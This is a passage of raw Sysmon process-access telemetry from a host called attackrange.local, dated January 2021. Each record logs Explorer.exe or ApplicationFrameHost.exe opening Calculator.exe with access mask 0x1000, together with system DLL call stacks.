10341000x8000000000000000361046Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361045Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361044Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361043Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361042Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361041Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361040Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361039Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361038Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361037Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361036Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361035Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361034Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361033Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361032Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361031Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.390{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ed6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361030Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361029Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+12f7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361028Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361027Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361026Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+78dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000361025Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361024Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361023Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.375{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 